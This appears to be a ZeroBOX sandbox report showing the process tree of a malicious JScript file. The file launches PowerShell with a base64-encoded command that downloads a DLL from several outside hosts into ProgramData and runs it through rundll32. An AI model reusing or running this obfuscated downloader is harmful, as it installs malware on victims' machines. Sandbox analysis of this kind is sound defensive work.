| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\DZQCirIAcHMmDb.js

    508
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JAB1AG4AaQBuAHQAcgB1AGQAaQBuAGcAbAB5AE8AdgBlAHIAdwByAGUAcwB0AGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAOABBAGQAZwBCAHAAQQBIAE0AQQBhAFEAQgAwAEEARwA4AEEAYwBnAEIATgBBAEcAVQBBAGIAQQBCAHAAQQBHAHcAQQBiAHcAQgAwAEEAQwA0AEEAWQB3AEIAdgBBAEcAUQBBAFoAUQBCAHoAQQBDADgAQQBTAEEAQQAwAEEASABrAEEAYwBnAEIAbwBBAEMAOABBAFkAZwBBAHoAQQBIAGsAQQBRAGcAQQA9AFMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATgBnAEEAdQBBAEQAZwBBAE0AQQBBAHUAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATgBBAEEANABBAEMAOABBAFMAQQBBAHYAQQBEAEUAQQBXAFEAQgBLAEEAQQA9AD0AUwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB5AEEARABNAEEATgBnAEEAdgBBAEYARQBBAGMAQQBCAFEAQQBIAEUAQQBMAHcAQgBDAEEARQBVAEEAVQBnAEIAVgBBAEUAOABBAGQAZwBBAD0AUwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIANQBBAEgATQBBAFkAdwBBAHkAQQBIAEUAQQBOAHcAQgBaAEEAQQA9AD0AUwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQB5AEEARABVAEEATQB3AEEAdgBBAEcAUQBBAFQAQQBCAHkAQQBHAHcAQQBXAEEAQQB4AEEARwBJAEEATAB3AEIASQBBAEYASQBBAFQAdwBCAHQAQQBFAG8AQQBaAEEAQgBQAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAdwBhAHIAYgBsAGUAZABRAHUAYQByAHIAZQBsAG8AdQBzAGwAeQAgAGkAbgAgACQAdQBuAGkAbgB0AHIAdQBkAGkAbgBnAGwAeQBPAHYAZQByAHcAcgBlAHMAdABlAGQAIAAtAHMAcABsAGkAdAAgACIAUwAiACkAIAB7AHQAcgB5ACAAewAkAE0AYQBsAG8AcABlAHIAYQB0AGkAbwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHcAYQByAGIAbABlAGQAUQB1AGEAcgByAGUAbABvAHUAcwBsAHkAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABNAGEAbABvAHAAZQByAGEAdABpAG8AbgAgAC0ATwAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGUAbQBvAHIAYQBsAGkAegBlAC4AZABsAGwAOwAkAHUAbgBpAG4AdAByAHUAZABpAG4AZwBsAHkATwB2AGUAcgB3AHIAZQBzAHQAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAyAEEARwBrAEEAZABnAEIAeQBBAEcAVQBBAGMAdwBBAHUAQQBIAEEAQQBjAGcAQgB2AEEARwBRAEEAZABRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBjAHcAQQA9AE4AVwBrAEsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEARwA0AEEAWgBnAEIAaABBAEcAMABBAGEAUQBCAHoAQQBHAGcAQQBRAHcAQgBvAEEARwBrAEEAYgBRAEIAdQBBAEcAVQBBAGUAUQBCAG8AQQBHAFUAQQBZAFEAQgBrAEEAQwA0AEEAZAB3AEIAdgBBAEgASQBBAGEAdwBCAHoAQQBBAD0APQBOAFcAawBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBAHoAQQBDADQAQQBOAFEAQQB6AEEAQwA0AEEATgBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBOAFcAawBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcAZwBBAFoAUQBCAGgAQQBIAEkAQQBhAEEAQgB2AEEARwBjAEEATABnAEIAegBBAEcATQBBAGEAQQBCAHYAQQBHADgAQQBiAEEAQQA9ACIAOwAkAFQAbwB4AGkAYwBvAG0AYQBuAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGgAQQBIAE0AQQBZAHcAQgBsAEEASABJAEEAZABBAEIAaABBAEcAawBBAGIAZwBCAGgAQQBHAEkAQQBiAEEAQgA1AEEAQwA0AEEAYwBnAEIAdgBBAEcAUQBBAFoAUQBCAHYAQQBBAD0APQBzAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVwBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBJAEEASABVAEEAYgBRAEIAdABBAEcAVQBBAGMAZwBBAHUAQQBIAFUAQQBjAHcAQQA9AHMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBQAEEASABZAEEAWgBRAEIAeQBBAEgATQBBAGMAQQBCAGwAQQBHADQAQQBaAEEAQgBOAEEARwBFAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAG8AQQBHADgAQQBiAHcAQgBrAEEAQwA0AEEAWQB3AEIAdgBBAEcAOABBAGEAdwBCAHAAQQBHADQAQQBaAHcAQQA9AHMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABrAEEATQBRAEEAdQBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEANQBBAEQAVQBBACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABcAGQAZQBtAG8AcgBhAGwAaQB6AGUALgBkAGwAbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADgANwA0ADEAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBZAHcAQgB0AEEARwBRAEEASQBBAEEAdgBBAEcATQBBAEkAQQBCAHkAQQBIAFUAQQBiAGcAQgBrAEEARwB3AEEAYgBBAEEAegBBAEQASQBBAEkAQQBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBFAFEAQQBZAFEAQgAwAEEARwBFAEEAWABBAEIAawBBAEcAVQBBAGIAUQBCAHYAQQBIAEkAQQBZAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFoAQQBCAHMAQQBHAHcAQQBMAEEAQgB0AEEASABVAEEAYwB3AEIAMABBAEQAcwBBACIAOwAkAFIAZQBlAG4AYwBsAG8AcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE0AZwBBAHUAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBRAEEAegBBAEQAWQBBAEwAZwBBAHgAQQBEAGMAQQBOAHcAQQA9AHEAagBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAUQBBAGEAUQBCAGwAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAYQBBAEIAcABBAEgAUQBBAFoAUQBBAHUAQQBHAFkAQQBZAFEAQgBwAEEARwB3AEEAcQBqAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABnAEEATABnAEEAeABBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQB4AEEAQwA0AEEATQBRAEEAeQBBAEQARQBBACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AH0AfQA="

      2136

Process contents

No process loaded Click on a process in the tree above to load its data.